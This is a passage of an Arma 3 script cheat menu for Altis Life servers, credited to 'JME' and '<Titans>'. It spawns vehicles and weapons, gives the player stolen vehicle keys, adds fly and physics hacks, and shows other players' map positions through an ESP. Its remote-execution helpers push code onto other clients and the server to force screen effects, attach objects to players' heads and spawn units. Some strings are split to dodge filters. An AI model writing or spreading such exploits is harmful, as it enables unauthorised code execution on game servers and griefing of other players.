  575. _name = getText(_config >> "displayName");
  576. if(_scope == 2 && (_cname isKindOf "LandVehicle" || _cname isKindOf "Air" || _cname isKindOf "Ship")) then {
  577. _index = _ctrl lbAdd _name;
  578. _ctrl lbSetPicture [_index,_pic];
  579. };
  580. } forEach vehicle_array;
  581. };
  582. _ctrl lbAdd "";
  583. };
  584. vehicle_dblclick = {
  585. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  586. _index = _this select 1;
  587. if(_index >= count(vehicle_array)) exitWith {};
  588. _v = vehicle_array select _index;
  589. if(isServer) then {
  590. _v createVehicle ((vehicle player) modelToWorld [0,5,0]);
  591. } else {
  592. if(isNil 'DB_fnc_cvFinished') then {
  593. _server = {
  594. DB_fnc_createVehicle = {
  595. _veh = _this select 0;
  596. _plr = _this select 1;
  597. _pos = _plr modelToWorld [0,5,0];
  598. _veh createVehicle _pos;
  599. [_veh] call life_fnc_clearVehicleAmmo;
  600. [[_veh,"trunk_in_use",false,true],"TON_fnc_setObjVar",false,false] call life_fnc_MP;
  601. [[_veh,"vehicle_info_owners",[[getPlayerUID _plr,name _plr]],true],"TON_fnc_setObjVar",false,false] call life_fnc_MP;
  602. _veh disableTIEquipment true;
  603. [_veh,"DB_fnc_cvFinished",_plr,false] call LIFE_fnc_MP;
  604. };
  605. };
  606. DB_fnc_cvFinished = {
  607. };
  608. [_server,false] call fnc_Exec;
  609. uiSleep 1;
  610. };
  611. [[_v,player],"DB_fnc_createVehicle",false,false] call LIFE_fnc_MP;
  612. };
  613. };
  614. GEF_weaponlist = {
  615. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  616. disableserialization;
  617. _ctrl = _this;
  618. if(isNil "GEF_wep_array") then {
  619. GEF_wep_array = [];
  620. _usedNames = [];
  621. _cfg = configFile >> "cfgWeapons";
  622. for "_i" from 0 to count(_cfg)-1 do {
  623. if(isNull _ctrl) exitWith {GEF_wep_array = nil;};
  624. _config = _cfg select _i;
  625. _cname = configName _config;
  626. _scope = getNumber(_config >> "scope");
  627. _pic = getText(_config >> "picture");
  628. _name = getText(_config >> "displayName");
  629. if(_scope == 2 && !(_name in _usedNames) && _pic != "") then {
  631. _index = _ctrl lbAdd _name;
  632. _ctrl lbSetPicture [_index,_pic];
  633. GEF_wep_array pushBack _cname;
  634. _usedNames pushBack _name;
  635. };
  636. };
  637. } else {
  638. {
  639. if(isNull _ctrl) exitWith {};
  640. _config = configFile >> "cfgWeapons" >> _x;
  641. _cname = configName _config;
  642. _scope = getNumber(_config >> "scope");
  643. _pic = getText(_config >> "picture");
  644. _name = getText(_config >> "displayName");
  645. if(_scope == 2) then {
  646. _index = _ctrl lbAdd _name;
  647. _ctrl lbSetPicture [_index,_pic];
  648. };
  649. } forEach GEF_wep_array;
  650. };
  651. _ctrl lbAdd "";
  652. };
  653. GEF_wep_dblclick = {
  654. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  655. _index = _this select 1;
  656. if(_index >= count(GEF_wep_array)) exitWith {};
  657. _wep = GEF_wep_array select _index;
  658. _mags = getArray(configFile >> "cfgWeapons" >> _wep >> "Magazines");
  659. _wholder = "groundWeaponHolder" createVehicle (position player);
  660. if(count(_mags) == 0) then {
  661. _wholder addItemCargoGlobal [_wep,1];
  662. } else {
  663. _wholder addWeaponCargoGlobal [_wep,1];
  664. _wholder addMagazineCargoGlobal [_mags select 0,9];
  665. };
  666. _wholder setposatl (getposatl player);
  667. };
  669. GEF_Heal = {
  670. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  671. life_thirst = 100;
  672. life_hunger = 100;
  673. player setFatigue 0;
  674. antidote1 = 2581;
  675. sleep 0.1;
  676. player setDamage 0;
  677. sleep 0.1;
  678. [true] call life_fnc_sessionUpdate;
  679. [] call life_fnc_hudUpdate;
  681. cutText[format["Player healed!"], "PLAIN DOWN"];
  682. };
  683. GEF_KeyBinDos = {
  684. switch (_this) do {
  685. case 61: //F3
  686. {
  687. hint "You have now the key";
  688. Life_vehicles set[count life_vehicles, cursorTarget];
  689. };
  690. case 62: //F4
  691. {
  692. hint "repaired";
  693. _veh = vehicle player;
  694. _veh setDamage 0;
  695. _veh setFuel 1;
  696. [] spawn GEF_Heal;
  697. };
  698. case 66: //F8
  699. {
  700. createdialog "RscDisplayInventory";
  701. };
  702. };
  703. };
  704. if (isNil "GEF_BindHandler") then {
  705. GEF_BindHandler = (findDisplay 46) displayAddEventHandler["KeyDown", "(_this select 1) call GEF_KeyBinDos; false;"];
  706. };
  719. ["Scripts From JME"] call {
  720. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  721. GEF_TrollPeople = {
  722. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  723. onMapSingleClick '
  724. for "_i" from 5 to 100 step 5 do {_grp = createGroup west; unit = _grp createUnit ["B_Soldier_VR_F", _pos, [], 100, "FORM"] ; [unit] join _grp ; unit move _pos ;};
  725. for "_i" from 5 to 100 step 5 do {_grp = createGroup west; unit = _grp createUnit ["O_Soldier_VR_F", _pos, [], 100, "FORM"] ; [unit] join _grp ; unit move _pos ;};
  726. for "_i" from 5 to 100 step 5 do {_grp = createGroup west; unit = _grp createUnit ["I_Soldier_VR_F", _pos, [], 100, "FORM"] ; [unit] join _grp ; unit move _pos ;};
  727. for "_i" from 5 to 100 step 5 do {_grp = createGroup west; unit = _grp createUnit ["C_Soldier_VR_F", _pos, [], 100, "FORM"] ; [unit] join _grp ; unit move _pos ;};
  728. onMapSingleClick "";
  729. hint "lel";
  730. ';
  731. hint 'open map and click where to place the trollers!';
  732. };
  733. LY_fly = {
  734. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  735. LY_ = 5;
  736. LY_leftAndRight = 2;
  737. LY_upAndDown = 6;
  738. LY_distanceFromGround = 1;
  739. LY_hovering = false;
  740. LY_hoverPos = nil;
  741. LY_ZVeh = 0.072;
  744. LY_move_forward = {
  745. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  746. if ((getPosATL(vehicle player) select 2) > LY_distanceFromGround) then {
  747. _vehicle = (vehicle player);
  748. _vel = velocity _vehicle;
  749. _dir = direction _vehicle;
  750. _speed = 0.4;
  751. comment "Added speed";
  752. _vehicle setVelocity[(_vel select 0) + (sin _dir * _speed), (_vel select 1) +
  753. (cos _dir * _speed), 0.4];
  754. };
  755. };
  757. LY_move_left = {
  758. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  759. if ((getPosATL(vehicle player) select 2) > LY_distanceFromGround) then {
  760. _leftDirection = getdir(vehicle player);
  761. (vehicle player) setdir(_leftDirection) - LY_leftAndRight;
  762. };
  763. };
  765. LY_move_backward = {
  766. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  767. if ((getPosATL(vehicle player) select 2) > LY_distanceFromGround) then {
  768. _vehicle = (vehicle player);
  769. _vel = velocity _vehicle;
  770. _dir = direction _vehicle;
  771. _speed = -0.4;
  772. comment "Added speed";
  773. _vehicle setVelocity[(_vel select 0) + (sin _dir * _speed), (_vel select 1) +
  774. (cos _dir * _speed), 0.4];
  775. };
  776. };
  778. LY_move_right = {
  779. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  780. if ((getPosATL(vehicle player) select 2) > LY_distanceFromGround) then {
  781. _rightDirection = getdir(vehicle player);
  782. (vehicle player) setdir(_rightDirection) + LY_leftAndRight;
  783. player setVariable["lastPos", 1];
  784. player setVariable["lastPos", []];
  785. };
  786. };
  788. LY_move_up = {
  789. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  790. _vehicle = (vehicle player);
  791. _vel = velocity _vehicle;
  792. LY_ZVeh = 4;
  793. _vehicle setVelocity[(_vel select 0), (_vel select 1), 4];
  794. };
  796. LY_move_up_up = {
  797. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  798. LY_ZVeh = 0.072;
  799. };
  801. LY_move_down = {
  802. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  803. if ((getPosATL(vehicle player) select 2) > LY_distanceFromGround) then {
  804. _vehicle = (vehicle player);
  805. _vel = velocity _vehicle;
  806. LY_ZVeh = -4;
  807. _vehicle setVelocity[(_vel select 0), (_vel select 1), -4];
  808. };
  809. };
  811. LY_move_down_up = {
  812. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  813. LY_ZVeh = 0.072;
  814. };
  816. toggle_hover = {
  817. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  818. LY_hovering = !LY_hovering;
  819. if (LY_hovering) then {
  820. titleText["Now Hovering!", "PLAIN DOWN"];
  821. titleFadeOut 4;
  822. LY_hoverPos = getPosATL(vehicle player);
  823. } else {
  824. titleText["No longer Hovering!", "PLAIN DOWN"];
  825. titleFadeOut 4;
  826. };
  827. };
  829. if (LY_BelieveIcanFly) then {
  830. hint "Fly Mode ON";
  831. titleText["Press 'spacebar' to toggle hover.", "PLAIN DOWN"];
  832. titleFadeOut 4;
  833. LY_BelieveIcanFly = true;
  834. LY_keyForward = (findDisplay 46) displayAddEventHandler["KeyDown", "if ((_this select 1) == 17) then {call LY_move_forward;}"];
  835. LY_keyLeft = (findDisplay 46) displayAddEventHandler["KeyDown", "if ((_this select 1) == 30) then {call LY_move_left;}"];
  836. LY_keyBackward = (findDisplay 46) displayAddEventHandler["KeyDown", "if ((_this select 1) == 31) then {call LY_move_backward;}"];
  837. LY_keyRight = (findDisplay 46) displayAddEventHandler["KeyDown", "if ((_this select 1) == 32) then {call LY_move_right;}"];
  838. LY_keyUp = (findDisplay 46) displayAddEventHandler["KeyDown", "if ((_this select 1) == 16) then {call LY_move_up;}"];
  839. LY_keyDown = (findDisplay 46) displayAddEventHandler["KeyDown", "if ((_this select 1) == 44) then {call LY_move_down;}"];
  840. LY_keyUpUp = (findDisplay 46) displayAddEventHandler["KeyUp", "if ((_this select 1) == 16) then {call LY_move_up_up;}"];
  841. LY_keyDownUp = (findDisplay 46) displayAddEventHandler["KeyUp", "if ((_this select 1) == 44) then {call LY_move_down_up;}"];
  842. LY_keyHover = (findDisplay 46) displayAddEventHandler["KeyDown", "if ((_this select 1) == 57) then {call toggle_hover;}"];
  843. } else {
  844. hint "Fly Mode OFF";
  845. titleText["Going Down!", "PLAIN DOWN"];
  846. titleFadeOut 4;
  847. (findDisplay 46) displayRemoveEventHandler["KeyDown", LY_keyForward];
  848. (findDisplay 46) displayRemoveEventHandler["KeyDown", LY_keyLeft];
  849. (findDisplay 46) displayRemoveEventHandler["KeyDown", LY_keyBackward];
  850. (findDisplay 46) displayRemoveEventHandler["KeyDown", LY_keyRight];
  851. (findDisplay 46) displayRemoveEventHandler["KeyDown", LY_keyUp];
  852. (findDisplay 46) displayRemoveEventHandler["KeyDown", LY_keyDown];
  853. (findDisplay 46) displayRemoveEventHandler["KeyDown", LY_keyHover];
  854. (finddisplay 46) displayRemoveEventHandler["KeyUp", LY_keyUpUp];
  855. (finddisplay 46) displayRemoveEventHandler["KeyUp", LY_keyDownUp];
  856. };
  858. while {
  859. LY_BelieveIcanFly
  860. }
  861. do {
  862. _velocity = velocity (vehicle player);
  863. if (LY_hovering) then {
  864. (vehicle player) setvelocity[0, 0, 0.2];
  865. } else {
  866. _velocity set [2,LY_ZVeh];
  867. (vehicle player) setVelocity _velocity;
  868. };
  869. };
  870. };
  871. GEF_Dog = {
  872. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  873. _randDog = {
  874. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  875. _dog = _this select (round(random(count(_this)-1)));
  876. _dog
  877. };
  878. _toClient = {
  879. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  880. CreateDog = {
  881. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  882. _type = _this;
  883. hint "A Dog is for Life, not just for Christmas!";
  884. sleep 5;
  885. _this createUnit [position player, group player];
  886. };
  887. };
  888. [_toClient,true] call GEF_Rmote;
  889. _dogs = ["Fin_sand_F","Fin_blackwhite_F","Fin_ocherwhite_F","Fin_tricolour_F","Alsatian_Sand_F","Alsatian_Black_F","Alsatian_Sandblack_F","Goat_random_F","Sheep_random_F"];
  890. {
  891. _theirDog = _dogs call _randDog;
  892. _code = ('_fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};"' + _theirDog + '" spawn CreateDog;');
  893. [_code,_x] call GEF_Rmote;
  894. } forEach playableUnits;
  895. };
  896. GEF_Almighty = {
  897. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  898. neo_cleanup = {
  899. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  900. {
  901. deleteVehicle _x;
  902. } forEach allDead;
  904. {
  905. deleteVehicle _x;
  906. } forEach (position player nearObjects ["Land_CargoBox_V1_F",1000]);
  908. neo_count = 0;
  909. hintSilent format ["Entities: %1", neo_count];
  910. };
  911. neo_fnc_throw = {
  912. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  913. _height = getPosASL player select 2;
  914. _height = _height + 5;
  915. _pos = [player, 5, getDir player] call bis_fnc_relPos;
  916. _pos set [2, _height];
  917. _object = objNull;
  919. switch (neo_type) do {
  920. case 0 : {
  921. _class = "Land_CargoBox_V1_F";
  922. _object = createVehicle [_class, position player, [], 0, "NONE"];
  923. _object allowDamage neo_damage;
  924. _object setVectorUp [random 1, random 1, random 1];
  925. _object setVectorDir [random 1, random 1, random 1];
  927. _object setPosASL _pos;
  928. };
  929. };
  931. _object setVelocity [(eyeDirection player select 0) * neo_force, (eyeDirection player select 1) * neo_force, (eyeDirection player select 2) * neo_force];
  933. neo_count = neo_count + 1;
  934. hintSilent format ["Entities: %1", neo_count];
  935. };
  936. neo_fnc_push = {
  937. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  938. {
  939. if (_x != player) then {
  940. _dir = [player, _x] call bis_fnc_dirTo;
  941. _x setVelocity [sin _dir * neo_force, cos _dir * neo_force, neo_force / 10];
  942. };
  943. } forEach (position player nearObjects 100);
  944. };
  945. neo_fnc_pull = {
  946. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  947. {
  948. if (_x != player) then {
  949. _dir = [_x, player] call bis_fnc_dirTo;
  950. _pos = getposatl _x;
  951. _z = _pos select 2;
  952. if(_z < 10) then {
  953. _x setVelocity [sin _dir * random 10, cos _dir * random 5, neo_force / 2];
  954. } else {
  955. _x setVelocity [sin _dir * random 10, cos _dir * random 5, 0];
  956. };
  957. };
  958. } forEach (position player nearObjects ["Land_CargoBox_V1_F",200]);
  959. };
  961. neo_throwing = false;
  962. neo_pushing = false;
  963. neo_pulling = false;
  964. neo_type = 0;
  965. neo_damage = false;
  966. neo_count = 0;
  967. neo_force = 10;
  969. findDisplay 46 displayAddEventHandler ["KeyDown", "if (_this select 1 == 2) then { neo_throwing = true; }; if (_this select 1 == 4) then { neo_pushing = true; }; if (_this select 1 == 3) then { neo_pulling = true; };"];
  970. findDisplay 46 displayAddEventHandler ["KeyUp", "if (_this select 1 == 2) then { neo_throwing = false; }; if (_this select 1 == 4) then { neo_pushing = false; }; if (_this select 1 == 3) then { neo_pulling = false; };"];
  974. player addAction ["Force - LOW", {neo_force = _this select 3;}, 10, -1, false, true, "", "neo_force != 10"];
  975. player addAction ["Force - MEDIUM", {neo_force = _this select 3;}, 50, -1, false, true, "", "neo_force != 50"];
  976. player addAction ["Force - HIGH", {neo_force = _this select 3;}, 100, -1, false, true, "", "neo_force != 100"];
  977. player addAction ["Force - HUGE", {neo_force = _this select 3;}, 500, -1, false, true, "", "neo_force != 500"];
  978. player addAction ["Allow Damage", {neo_force = _this select 3;}, true, -1, false, true, "", "!neo_damage"];
  979. player addAction ["Do Not Allow Damage", {neo_force = _this select 3;}, false, -1, false, true, "", "neo_damage"];
  980. player addAction ["Clean Up", {[] spawn neo_cleanup;}, [], -1, false, true, "", "true"];
  982. hint "Welcome to the PhysX Hack\n\n\nPress 1 to spawn object with applied forces.\n\nPress 2 and 3 to apply forces to nearby objects.\n\n\nHave fun!";
  984. while{true} do {
  985. if (neo_throwing) then { [] call neo_fnc_throw; };
  986. if (neo_pushing) then { [] call neo_fnc_push; };
  987. if (neo_pulling) then { [] call neo_fnc_pull; };
  988. uiSleep 0.001;
  989. };
  990. };
  991. OQrv8OYvXgQjIh2aFY5q_Mapesp = {
  994. if (isnil "COHFEWIFWEHUG37243599GJHIEGWEH_COHFEWIFWEHUG37243599GJHIEGWEH_Map_Markers") then {
  996. };
  997. if (COHFEWIFWEHUG37243599GJHIEGWEH_COHFEWIFWEHUG37243599GJHIEGWEH_Map_Markers == 0) then {
  999. systemChat "<Titans> Map ESP ON!";
  1000. } else {
  1002. systemChat "<Titans> Map ESP OFF!";
  1003. };
  1004. while {
  1006. }
  1007. do {
  1008. {
  1009. if ((vehicle _x isKindOf "LandVehicle") || (vehicle _x isKindOf "Air") || (vehicle _x isKindOf "Ship")) then {
  1010. if (count(crew vehicle _x) > 0) then {
  1011. {
  1012. if (!(_x in COHFEWIFWEHUG37243599GJHIEGWEH_COHFEWIFWEHUG37243599GJHIEGWEH_Noobs) and(alive _x) and(getPlayerUID _x != "")) then {
  1013. private["_pos", "_l44", "_l45"];
  1014. _l45 = vehicle _x;
  1015. _pos = visiblePosition _x;
  1016. _l44 = createMarkerLocal[format["CRW%1%2", _pos select 0, _pos select 1], [(_pos select 0) + 20, _pos select 1, 0]];
  1017. _l8 = (gettext(configFile >> 'CfgVehicles' >> (typeof vehicle _x) >> 'displayName'));
  1018. _l44 setMarkerTextLocal format['%1---%2---%3m', name _x, _l8, round(_x distance player)];
  1019. _l44 setMarkerTypeLocal "mil_dot";
  1020. if ((side _x == side player) and(side _x != resistance)) then {
  1021. _l44 setMarkerColorLocal "ColorBlue";
  1022. } else {
  1023. _l44 setMarkerColorLocal "ColorRed";
  1024. };
  1025. _l44 setMarkerSizeLocal[1, 1];
  1027. [_x, _l44, _l45] spawn {
  1028. private["_l46", "_l47", "_l48"];
  1029. _l46 = _this select 0;
  1030. _l47 = _this select 1;
  1031. while {
  1032. (COHFEWIFWEHUG37243599GJHIEGWEH_COHFEWIFWEHUG37243599GJHIEGWEH_Map_Markers == 1) and(alive _l46) and(vehicle _l46 != _l46) and(getPlayerUID _l46 != "")
  1033. }
  1034. do {
  1035. _l48 = ((crew vehicle _l46) find _l46);
  1036. _l47 setMarkerPosLocal([(visiblePosition _l46 select 0) + 20, (visiblePosition _l46 select 1) - (25 + _l48 * 20), 0]);
  1037. sleep 0.01;
  1038. };
  1039. deleteMarkerLocal _l47;
  1040. if (_l46 in COHFEWIFWEHUG37243599GJHIEGWEH_COHFEWIFWEHUG37243599GJHIEGWEH_Noobs) then {
  1043. };
  1044. true;
  1045. };
  1046. };
  1047. }
  1048. forEach crew vehicle _x;
  1049. };
  1050. } else {
  1051. if (!(_x in COHFEWIFWEHUG37243599GJHIEGWEH_COHFEWIFWEHUG37243599GJHIEGWEH_Bitches) and(vehicle _x == _x) and(getPlayerUID _x != "")) then {
  1052. private["_pos", "_l44"];
  1053. _pos = visiblePosition _x;
  1054. _l44 = createMarkerLocal[format["PLR%1%2", _pos select 0, _pos select 1], [(_pos select 0) + 20, _pos select 1, 0]];
  1055. _l44 setMarkerTypeLocal "mil_dot";
  1056. _l44 setMarkerSizeLocal[1, 1];
  1057. if ((side _x == side player) and(side _x != resistance)) then {
  1058. _l44 setMarkerColorLocal "ColorWhite";
  1059. } else {
  1060. _l44 setMarkerColorLocal "ColorRedAlpha";
  1061. };
  1062. _l44 setMarkerTextLocal format["%1---%2", name _x, round(_x distance player)];
  1063. if (_x == player) then {
  1064. _l44 setMarkerColorLocal "ColorGreen";
  1065. };
  1067. [_x, _l44] spawn {
  1068. private["_l46", "_l47"];
  1069. _l46 = _this select 0;
  1070. _l47 = _this select 1;
  1071. while {
  1072. (COHFEWIFWEHUG37243599GJHIEGWEH_COHFEWIFWEHUG37243599GJHIEGWEH_Map_Markers == 1) and(alive _l46) and(vehicle _l46 == _l46) and(getPlayerUID _l46 != "")
  1073. }
  1074. do {
  1075. _l47 setMarkerPosLocal([visiblePosition _l46 select 0, visiblePosition _l46 select 1, 0]);
  1076. sleep 0.01;
  1077. };
  1078. deleteMarkerLocal _l47;
  1079. if (_l46 in COHFEWIFWEHUG37243599GJHIEGWEH_COHFEWIFWEHUG37243599GJHIEGWEH_Bitches) then {
  1082. };
  1083. true;
  1084. };
  1085. };
  1086. };
  1087. }
  1088. forEach playableUnits;
  1089. sleep 0.3;
  1090. }; {
  1091. _l44 = str _x;
  1092. deleteMarkerLocal _l44;
  1093. }
  1094. forEach playableUnits;
  1095. };
  1096. GEF_Fuckfest_v1 = {
  1097. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1098. [{
  1099. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1100. fuckfest = {
  1101. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1102. playMusic "Track11_StageB_stealth";
  1103. cutText ["","BLACK OUT",1];
  1104. sleep 1;
  1105. cutText ["","BLACK IN",1];
  1106. sleep 1;
  1107. cutText ["Created By JME","PLAIN",1];
  1108. sleep 5;
  1109. cutText ["Welcome to the Fuckfest","BLACK OUT",1];
  1110. sleep 1;
  1111. mood = ppEffectCreate ["colorCorrections", 1501];
  1112. mood ppEffectEnable true;
  1113. mood ppEffectAdjust [ 1, 1, 0, [0, 0, 0, -0.31],[1.9, 1.9, 1.73, 0.7],[0.2, 1.1, -1.5, 1.64]];
  1114. mood ppEffectCommit 0;
  1116. mood = ppEffectCreate ["colorCorrections", 1501];
  1117. mood ppEffectEnable true;
  1118. mood ppEffectAdjust [1, 1, 0, [0.0, 0.0, 0.0, 0.0], [0.8*2, 0.5*2, 0.0, 0.7], [0.9, 0.9, 0.9, 0.0]];
  1119. mood ppEffectCommit 0;
  1121. mood = ppEffectCreate ["colorCorrections", 1501];
  1122. mood ppEffectEnable true;
  1123. mood ppEffectAdjust [ 1, 0.21, 0, [0.1, 0, 0, 0],[3.59, 3.49, 3.78, 0.83],[-0.31, 0.08, 3.79, 5]];
  1124. mood ppEffectCommit 0;
  1125. sleep 4;
  1126. cutText["","BLACK IN", 1];
  1127. sleep 4;
  1129. playSound "Earthquake_01";
  1130. enableCamShake true;
  1131. sleep 2;
  1132. addCamShake [5, 11, 10];
  1134. sleep 10;
  1136. playSound "Earthquake_04";
  1137. sleep 2;
  1138. addCamShake [10, 12, 20];
  1140. sleep 8;
  1142. enableCamShake false;
  1144. ppColor = ppEffectCreate ["ColorCorrections", 1999];
  1145. ppColor ppEffectEnable true;
  1146. ppColor ppEffectAdjust [0.5, 1, 0, [1, 1, 1, 0], [1, 1, 1, 0.0], [1, 1, 1, 1.0]];
  1147. ppColor ppEffectCommit 0;
  1149. ppBlur = ppEffectCreate ["dynamicBlur", 505];
  1150. ppBlur ppEffectEnable true;
  1151. ppBlur ppEffectAdjust [.5];
  1152. ppBlur ppEffectCommit 0;
  1154. ppGrain = ppEffectCreate ["filmGrain", 2005];
  1155. ppGrain ppEffectEnable true;
  1156. ppGrain ppEffectAdjust [0.02, 1, 1, 0, 1];
  1157. ppGrain ppEffectCommit 0;
  1158. setaperture 25;
  1159. sleep 0.01;
  1160. setaperture 200;
  1162. sleep 5;
  1164. ppEffectDestroy mood;
  1165. ppEffectDestroy ppColor;
  1166. ppEffectDestroy ppBlur;
  1167. ppEffectDestroy ppGrain;
  1168. "dynamicBlur" ppEffectAdjust [0];
  1169. "dynamicBlur" ppEffectCommit 16;
  1170. "colorCorrections" ppEffectAdjust [1, 1, 0, [1, 1, 1, 0.0], [1, 1, 1, 1], [1, 1, 1, 0.0]];
  1171. "colorCorrections" ppEffectCommit 0;
  1172. setaperture 0;
  1173. playMusic "";
  1174. sleep 2;
  1175. cutText ["Aborted","PLAIN",1];
  1176. sleep 10;
  1177. cutText ["See you in another life brother","PLAIN",1];
  1178. };
  1179. [] spawn fuckfest;
  1181. },true] call GEF_Rmote;
  1182. };
  1183. GEF_ConeHat = {
  1184. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1185. _toClients = {
  1186. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1187. onHead = {
  1188. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1189. _obj = _this;
  1190. _obj attachTo [player, [-0.05,-0.05,0.4],"Head"];
  1191. _timer = 30;
  1192. for "_i" from 0 to _timer do
  1193. {
  1194. hintSilent (str (_timer - _i)+(" seconds left with conehead."));
  1195. sleep 1;
  1196. };
  1197. sleep 1;
  1198. deletevehicle _obj;
  1199. hint "Bye Cone!";
  1200. };
  1201. };
  1202. _toServer = {
  1203. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1204. call compile (" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};
  1205. {
  1206. _conehead = ""RoadCone_F"" create" + "Vehicle (position _x);
  1207. [_conehead,""onHead"",_x,false] call BIS" + "_fnc_MP;
  1208. } forEach playabl" + "eUnits;
  1209. ");
  1210. };
  1211. [_toClients,true] call GEF_Rmote;
  1212. sleep 1;
  1213. [_toServer,false] call GEF_Rmote;
  1214. };
  1215. GEF_BagHat = {
  1216. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1217. _toClients = {
  1218. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1219. onHead_Sack = {
  1220. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1221. _obj = _this;
  1222. _obj attachTo [player, [-0.05,-0.05,0.4],"Head"];
  1223. _timer = 30;
  1224. for "_i" from 0 to _timer do
  1225. {
  1226. hintSilent (str (_timer - _i)+(" seconds left with a sackhead."));
  1227. sleep 1;
  1228. };
  1229. sleep 1;
  1230. deletevehicle _obj;
  1231. hint "Bye Sack!";
  1232. };
  1233. };
  1234. _toServer = {
  1235. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1236. call compile (" _fnc_scriptName = if (isnil ""_fnc_scriptName"") then {""Functions Init""} else {_fnc_scriptName};
  1237. {
  1238. _conehead = ""Land_Sack_F"" create" + "Vehicle (position _x);
  1239. [_conehead,""onHead_Sack"",_x,false] call BIS" + "_fnc_MP;
  1240. } forEach playabl" + "eUnits;
  1241. ");
  1242. };
  1243. [_toClients,true] call GEF_Rmote;
  1244. sleep 1;
  1245. [_toServer,false] call GEF_Rmote;
  1246. };
  1247. GEF_JetBus = {
  1248. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1249. hint "Quad-Train V1";
  1251. _dirme = getDir player;
  1252. _pos = player modelToWorld [0,20,0.2];
  1254. _jetslut = "B_Plane_CAGEF_01_F" createVehicle _pos;
  1255. _jetslut allowDamage false;
  1256. _jetslut setDir _dirme;
  1258. _jmesays = "O_Quadbike_01_F" createVehicle _pos;
  1259. _jmesays attachTo [_jetslut, [2.7,4,0]];
  1260. _jmesays allowDamage false;
  1261. _jmesays = "O_Quadbike_01_F" createVehicle _pos;
  1262. _jmesays attachTo [_jetslut, [-2.7,4,0]];
  1263. _jmesays allowDamage false;
  1264. _jmesays = "O_Quadbike_01_F" createVehicle _pos;
  1265. _jmesays attachTo [_jetslut, [2.7,8,0]];
  1266. _jmesays allowDamage false;
  1267. _jmesays = "O_Quadbike_01_F" createVehicle _pos;
  1268. _jmesays attachTo [_jetslut, [-2.7,8,0]];
  1269. _jmesays allowDamage false;
  1270. _jmesays = "O_Quadbike_01_F" createVehicle _pos;
  1271. _jmesays attachTo [_jetslut, [2.7,12,0]];
  1272. _jmesays allowDamage false;
  1273. _jmesays = "O_Quadbike_01_F" createVehicle _pos;
  1274. _jmesays attachTo [_jetslut, [-2.7,12,0]];
  1275. _jmesays allowDamage false;
  1276. };
  1277. GEF_BoxQuad = {
  1278. _fnc_scriptName = if (isnil "_fnc_scriptName") then {"Functions Init"} else {_fnc_scriptName};
  1279. hint "Moving Weapon Box V1";
  1280. _pos = player modelToWorld [0,8,0.2];
  1282. _battlebus = "O_Quadbike_01_F" createVehicle _pos;
  1283. _battlebus allowDamage false;
  1284. _sidepanelR = "Box_East_WpsSpecial_F" createVehicle _pos;
  1285. _sidepanelR attachTo [_battlebus, [0,1.5,-0.8]];
  1286. _sidepanelR = "Box_East_WpsSpecial_F" createVehicle _pos;
  1287. _sidepanelR attachTo [_battlebus, [0,-1.5,-0.8]];
